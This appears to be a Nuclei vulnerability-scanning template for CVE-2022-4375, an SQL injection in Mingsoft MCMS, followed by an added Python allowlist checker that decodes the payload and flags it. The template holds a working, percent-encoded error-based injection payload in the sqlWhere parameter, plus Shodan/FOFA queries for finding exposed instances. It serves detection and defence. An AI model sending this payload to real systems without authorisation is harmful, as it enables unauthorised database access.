Vulnerability description
SQL injection vulnerability in Mingsoft MCMS up to 5.2.9 via the sqlWhere parameter in /cms/category/list.
id: CVE-2022-4375

info:
  name: Mingsoft MCMS - SQL Injection
  author: ritikchaddha
  severity: critical
  description: |
    SQL injection vulnerability in Mingsoft MCMS up to 5.2.9 via the sqlWhere parameter in /cms/category/list.
  impact: |
    Successful exploitation could lead to unauthorized access to sensitive data.
  remediation: |
    Apply the vendor-supplied patch or update to the latest version.
  reference:
    - https://gitee.com/mingSoft/MCMS/issues/I61TG5
    - https://nvd.nist.gov/vuln/detail/CVE-2022-4375
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-4375
    cwe-id: CWE-89,CWE-707
    epss-score: 0.46103
    epss-percentile: 0.97572
    cpe: cpe:2.3:a:mingsoft:mcms:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: mingsoft
    product: mcms
    shodan-query: http.favicon.hash:1464851260
    fofa-query: icon_hash="1464851260"
  tags: cve,cve2022,mingsoft,mcms,sqli

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        words:
          - "mingsoft.net"
        internal: true

  - raw:
      - |
        POST /cms/category/list? HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        sqlWhere=%5b%7b%22%61%63%74%69%6f%6e%22%3a%22%22%2c%22%66%69%65%6c%64%22%3a%22%65%78%74%72%61%63%74%76%61%6c%75%65%28%30%78%37%65%2c%63%6f%6e%63%61%74%28%30%78%37%65%2c%28%64%61%74%61%62%61%73%65%28%29%29%29%29%22%2c%22%65%6c%22%3a%22%65%71%22%2c%22%6d%6f%64%65%6c%22%3a%22%63%6f%6e%74%65%6e%74%54%69%74%6c%65%22%2c%22%6e%61%6d%65%22%3a%22%e6%96%87%e7%ab%a0%e6%a0%87%e9%a2%98%22%2c%22%74%79%70%65%22%3a%22%69%6e%70%75%74%22%2c%22%76%61%6c%75%65%22%3a%22%61%22%7d%5d

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "java.sql.SQLSyntaxErrorException"
          - "java.sql.SQLException"
        condition: or

      - type: word
        part: body
        words:
          - "Icategorydao.xml"
          - "cms_category"
        condition: or

      - type: status
        status:
          - 500
          - 200
# digest: 4a0a00473045022013ba120ff45ee1352fc46a3125441913cc4e3f499f932a68fedfc6ed5ed2f923022100f77f049c37c84ce216a8bb7df55ba2aa1780e95e69eb34becb1015633b6cf991:922c64590222798bb761d5b6d8e72950
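The sqlWhere body the second request posts is a percent-encoded JSON list of filter objects, and the template places its SQL expression in the `field` key of that object, which is why its matchers look for SQL exception text in the response. As an added defender-side example (not code from the template, from Mingsoft, or from MCMS), the Python below decodes that value, admits only allowlisted column names and operators, and offers a log-side check over a raw form body; the column and operator names in the allowlists are assumptions, since the real cms_category columns are not given here.

```python
"""Allowlist check for the sqlWhere filter list sent to /cms/category/list.
Added example, not MCMS or template code; column and operator names are assumed."""
import json
from urllib.parse import unquote

# Assumed allowlist; the real cms_category column names are not on the page.
ALLOWED_FIELDS = {"contentTitle", "categoryTitle", "categoryId"}
ALLOWED_OPS = {"eq", "like", "gt", "lt"}  # assumed values of the `el` key

def parse_sql_where(raw: str) -> list:
    """Percent-decode and JSON-parse a sqlWhere value into its filter list."""
    data = json.loads(unquote(raw))
    if not isinstance(data, list) or not all(isinstance(f, dict) for f in data):
        raise ValueError("sqlWhere must be a JSON array of filter objects")
    return data

def check_filters(filters: list) -> list:
    """Return one reason per rejected filter; an empty list means clean."""
    problems = []
    for i, f in enumerate(filters):
        field, op = str(f.get("field", "")), str(f.get("el", ""))
        # The template's payload puts a SQL expression in `field`; only a known
        # column name may reach the query, so allowlist membership decides.
        if field not in ALLOWED_FIELDS:
            problems.append(f"filter {i}: field {field!r} is not an allowed column")
        if op not in ALLOWED_OPS:
            problems.append(f"filter {i}: operator {op!r} is not allowed")
    return problems

def body_is_suspicious(form_body: str) -> bool:
    """Detection view over a raw x-www-form-urlencoded body, as seen in a log."""
    for pair in form_body.split("&"):
        key, _, raw = pair.partition("=")
        try:
            if key == "sqlWhere" and check_filters(parse_sql_where(raw)):
                return True
        except ValueError:  # json.JSONDecodeError is a ValueError as well
            return True  # an unparsable sqlWhere is also worth flagging
    return False

# The encoded sqlWhere value from the template's second request, split for width.
TEMPLATE_PAYLOAD = (
    "%5b%7b%22%61%63%74%69%6f%6e%22%3a%22%22%2c%22%66%69%65%6c%64%22%3a%22%65%78%74%72%61%63%74%76%61%6c%75%65%28%30%78%37%65%2c%63%6f%6e%63%61%74"
    "%28%30%78%37%65%2c%28%64%61%74%61%62%61%73%65%28%29%29%29%29%22%2c%22%65%6c%22%3a%22%65%71%22%2c%22%6d%6f%64%65%6c%22%3a%22%63%6f%6e%74%65%6e%74%54%69"
    "%74%6c%65%22%2c%22%6e%61%6d%65%22%3a%22%e6%96%87%e7%ab%a0%e6%a0%87%e9%a2%98%22%2c%22%74%79%70%65%22%3a%22%69%6e%70%75%74%22%2c%22%76%61%6c%75%65%22%3a%22%61%22%7d%5d"
)
# Constructed benign filter of the same shape: title equals "a".
BENIGN = '[{"action":"","field":"contentTitle","el":"eq","model":"contentTitle","name":"t","type":"input","value":"a"}]'

if __name__ == "__main__":
    print(check_filters(parse_sql_where(TEMPLATE_PAYLOAD)))
```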